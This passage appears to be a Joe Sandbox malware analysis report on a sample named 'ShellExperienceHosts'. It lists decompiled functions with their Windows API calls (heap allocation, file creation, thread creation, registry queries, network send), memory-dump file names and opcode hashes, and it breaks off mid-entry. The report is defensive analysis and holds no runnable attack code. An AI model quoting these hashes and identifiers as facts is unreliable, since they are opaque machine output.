                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ConditionMask$H_prolog3InfoMetricsSystemVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 2710481357-0
                                                                            • Opcode ID: 2714d577713ee4987a2ae374e09be146da2a5bbaef737462b0ff0f6a8c3fa97b
                                                                            • Instruction ID: aa27ffc7d0dc9e75c63fc3255c3f0a62e5469b167017c1f7682d0e08e8546477
                                                                            • Opcode Fuzzy Hash: 2714d577713ee4987a2ae374e09be146da2a5bbaef737462b0ff0f6a8c3fa97b
                                                                            • Instruction Fuzzy Hash: 1E51DEB0946F45CFD3A9CF3A85457C6FAE0BF89300F50CA2E81AED6660EB7165848F51
                                                                            Function 6C86A1F2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __wsopen_s
                                                                            • String ID:
                                                                            • API String ID: 3347428461-0
                                                                            • Opcode ID: fe9e680b3c280d84140272012e4a79c18e73363b21eef082f72885eee2dd8744
                                                                            • Instruction ID: a9182b8676ea023a323693e6701e030ae9f02d6cf748a2f20b24c0872b83823f
                                                                            • Opcode Fuzzy Hash: fe9e680b3c280d84140272012e4a79c18e73363b21eef082f72885eee2dd8744
                                                                            • Instruction Fuzzy Hash: 35115871A0420AABCB15CF59E9409DB3BF9EB48308B004469F805AB301D771EA11CBA5
                                                                            Function 0333A6F2 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0333454A,00000000,00000001,00000000,00000000,00000000,?,03333E0D,00000001,00000214,?,03334500), ref: 0333A735
                                                                              • Part of subcall function 0332F91B: __getptd_noexit.LIBCMT ref: 0332F91B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 328603210-0
                                                                            • Opcode ID: 0a35f36438f46ce7d9738bde0908bd1f04950a04125f32e664beea38672fe635
                                                                            • Instruction ID: c5cdebc93edc362b3616637a675f160dc2fb7bc2edf3b154ba423cbf35fdc745
                                                                            • Opcode Fuzzy Hash: 0a35f36438f46ce7d9738bde0908bd1f04950a04125f32e664beea38672fe635
                                                                            • Instruction Fuzzy Hash: 7901D8392013159FEB24DFA5DCC4B7737B8AB827A1F19C529F895CB1A0DB34D4018750
                                                                            Function 1000E555 Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,10009FFA,00000000,00000001,00000000,00000000,00000000,?,100098C1,00000001,00000214,?,10009FB0), ref: 1000E598
                                                                              • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 328603210-0
                                                                            • Opcode ID: d06f835299f278651632b800e6ea60e14773797a6a441bb7e279904f59b9ce12
                                                                            • Instruction ID: 103cc215c0c144a9a87f3cbc911116c8ac8a7c4356fc0ca5ef77af160fbe558d
                                                                            • Opcode Fuzzy Hash: d06f835299f278651632b800e6ea60e14773797a6a441bb7e279904f59b9ce12
                                                                            • Instruction Fuzzy Hash: E9012435205A958EFB18CF24CC54B5A37D4EB853E6F018929E815AA0D4EB70DC00CB80
                                                                            Function 6C7E171C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetMalloc.SHELL32(00000004), ref: 6C7E173C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Malloc
                                                                            • String ID:
                                                                            • API String ID: 2696272793-0
                                                                            • Opcode ID: b982a3f190e0403688111cbb6c0fb81b08745cb9e7ab2ebbe48bdea882a6c32a
                                                                            • Instruction ID: 924bb3d0e031ef33aa590a81af265754fdb64aabae2925aa1b99333edf2e7a58
                                                                            • Opcode Fuzzy Hash: b982a3f190e0403688111cbb6c0fb81b08745cb9e7ab2ebbe48bdea882a6c32a
                                                                            • Instruction Fuzzy Hash: 04118E72704215AFCB20CF15EA09B56B7B8FB89769F10453EE416C3A40D734E804CBD0
                                                                            Function 6C7A170B Relevance: 1.5, APIs: 1, Instructions: 44COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C7A1712
                                                                              • Part of subcall function 6C7A134E: TlsAlloc.KERNEL32(?,6C7A173E,00000004,6C75C8C8,6C73EE4E,6C75FACA,?,6C73D391,?,?,?,6C738C8A,00000000,?), ref: 6C7A136D
                                                                              • Part of subcall function 6C7A134E: InitializeCriticalSection.KERNEL32(6C8F4114,?,6C7A173E,00000004,6C75C8C8,6C73EE4E,6C75FACA,?,6C73D391,?,?,?,6C738C8A,00000000,?), ref: 6C7A137E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocCriticalH_prolog3InitializeSection
                                                                            • String ID:
                                                                            • API String ID: 2369468792-0
                                                                            • Opcode ID: 10fd193201e4b27f606b992b35bfe827f5c6f4b516f076a9f266094224c25180
                                                                            • Instruction ID: ce07331a522f9a01739ebca2bc0bd8e7df2de55763785e506df6bbde8da26dab
                                                                            • Opcode Fuzzy Hash: 10fd193201e4b27f606b992b35bfe827f5c6f4b516f076a9f266094224c25180
                                                                            • Instruction Fuzzy Hash: AA014034600206DBEB149FF5C71C9AD36B5AF952A9B104635E961CBB80EF34C946CB90
                                                                            Function 6C866B28 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000008,?,?,?,6C863AB0,00000001,00000364,?,00000006,000000FF,?,6C860602,?,6C6D82D0,00000000), ref: 6C866B69
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 5cf89626a5dba73c36557e87c13ad7af020a67cfa6a816e8b42324fac071a499
                                                                            • Instruction ID: 8335498e28cba3f7a3149003b759acaa98191dad8e5e9601b39bdd5f40ec511e
                                                                            • Opcode Fuzzy Hash: 5cf89626a5dba73c36557e87c13ad7af020a67cfa6a816e8b42324fac071a499
                                                                            • Instruction Fuzzy Hash: 99F0B432605668F6EB325A379B04E5E3B68BF427B4B108921AC14D6D84EF30E80187E4
                                                                            Function 6C863811 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000000,6C867782,?,?,6C867782,00000220,?,?,?), ref: 6C863843
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 97e3c35e3a6a8a642b0eef7afcbb2bfc98312f6e6e6c098d1ca028546e9919cd
                                                                            • Instruction ID: c1cf27ba9e949bf97fcea3b7445eeebb65b3bc3c3192d7a06d62993103805f5a
                                                                            • Opcode Fuzzy Hash: 97e3c35e3a6a8a642b0eef7afcbb2bfc98312f6e6e6c098d1ca028546e9919cd
                                                                            • Instruction Fuzzy Hash: D8E0E53160523467FA3116AB8F04BC63AAC9B02BF8F100934EC1497F81EB60EC00C2E1
                                                                            Function 1000608A Relevance: 1.5, APIs: 1, Instructions: 25registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: ce9d18141ac8a2415a65a9b8a38807c62c68c0f35cc9388145c160860f9cea29
                                                                            • Instruction ID: d3b2713253b45803e0e36550a0a091f6b3b019736998aa0157c013c20421de29
                                                                            • Opcode Fuzzy Hash: ce9d18141ac8a2415a65a9b8a38807c62c68c0f35cc9388145c160860f9cea29
                                                                            • Instruction Fuzzy Hash: B2E09274908216EADB25DB80C984BFE73B5FB64385F30814DE8042F094D375AE84AA91
                                                                            Function 6C873543 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,00000000,?,6C8731E7,?,?,00000000,?,6C8731E7,?,0000000C), ref: 6C873560
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 9acfd5fa8d5b8c8b37da181be67fecbbbb6547534e356c4509c6665a0ac22b42
                                                                            • Instruction ID: 545d73f5156a8406ed7b3da20efef0cdf1a1c4b7f7ee0449ae3bae4a736e6e10
                                                                            • Opcode Fuzzy Hash: 9acfd5fa8d5b8c8b37da181be67fecbbbb6547534e356c4509c6665a0ac22b42
                                                                            • Instruction Fuzzy Hash: 57D06C3210010DFBDF129E84DC06EDA3BAAFB88715F114010BA1896020C736E871EB90
                                                                            Function 10005E07 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID:
                                                                            • API String ID: 3660427363-0
                                                                            • Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                            • Instruction ID: fe46c43de78f47d222b333b3703367a29387d0af8959c827854050506a177f75
                                                                            • Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                            • Instruction Fuzzy Hash: 26C08C30C4C75EE2D032E8101C0A1BDB3E4E778299F3005BFAC452D884E4F4A9C0B6EA
                                                                            Function 100060DF Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 1001FAB1
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentThread
                                                                            • String ID:
                                                                            • API String ID: 2882836952-0
                                                                            • Opcode ID: aaf3e0f0d0f8f1f3a4ac2f5b8bd5fab41d3eaa100fa15abfee4d2d644b7fd40f
                                                                            • Instruction ID: 723c430d69d621f95a846468934f8435ff5600678504d51602c72318876ab3a6
                                                                            • Opcode Fuzzy Hash: aaf3e0f0d0f8f1f3a4ac2f5b8bd5fab41d3eaa100fa15abfee4d2d644b7fd40f
                                                                            • Instruction Fuzzy Hash: B9D012B8104910C7E310DB50C4C465EB2E1FF58300F30C519E92D8B615C738F8C18652
                                                                            Function 10004274 Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 10020693
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: 13c8da13fabdb43a0039df29cdbc36604e7b86c2d4870efbc9606bf7f6935c8f
                                                                            • Instruction ID: caee183b5a6c68c45fee89ce5ab94ef9cb690e012967d693a85690ee7ea4d081
                                                                            • Opcode Fuzzy Hash: 13c8da13fabdb43a0039df29cdbc36604e7b86c2d4870efbc9606bf7f6935c8f
                                                                            • Instruction Fuzzy Hash: 20C04C3424C314E9F430D1442C46B5C1401F75EB65EB543177B205E4D74D7040C13553
                                                                            Function 6C6E1E5C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 6C6E1E6B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteObject
                                                                            • String ID:
                                                                            • API String ID: 1531683806-0
                                                                            • Opcode ID: 22faf8f3ddf0138e55d1a706a7da0f6e3b888a633c287f5be0e622a40dfe04df
                                                                            • Instruction ID: da0dbafbfeadc192e182f0f2f709d0814da2a0a521437b673064330e0a8eb2e5
                                                                            • Opcode Fuzzy Hash: 22faf8f3ddf0138e55d1a706a7da0f6e3b888a633c287f5be0e622a40dfe04df
                                                                            • Instruction Fuzzy Hash: 2AB092B0A1A106AECE049B31860C3076A749B4630EF8488B9B00482402DF7AC807EA48
                                                                            Function 1001F63D Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: send
                                                                            • String ID:
                                                                            • API String ID: 2809346765-0
                                                                            • Opcode ID: b133ea7d05f53c3c11ad6334d0588478f261473ccb87b5617e28918120fa56af
                                                                            • Instruction ID: 6b957aef4a72e5dc30e8cb3213a85d60c43ac51bc1e09057d618b7ba0e2fc2ae
                                                                            • Opcode Fuzzy Hash: b133ea7d05f53c3c11ad6334d0588478f261473ccb87b5617e28918120fa56af
                                                                            • Instruction Fuzzy Hash: 8D900238288511FAA2124A2158897593654D6145423185418DC02C9010D631C2806514
                                                                            Function 6C6D9B35 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 06b95f28783c42a62d0dd3f0555b4c7354c8569cd33c09753ea8586443556610
                                                                            • Instruction ID: b85a38f14b56066bd859603d9e931e75f462d85050c2e1ad45688f850c874064
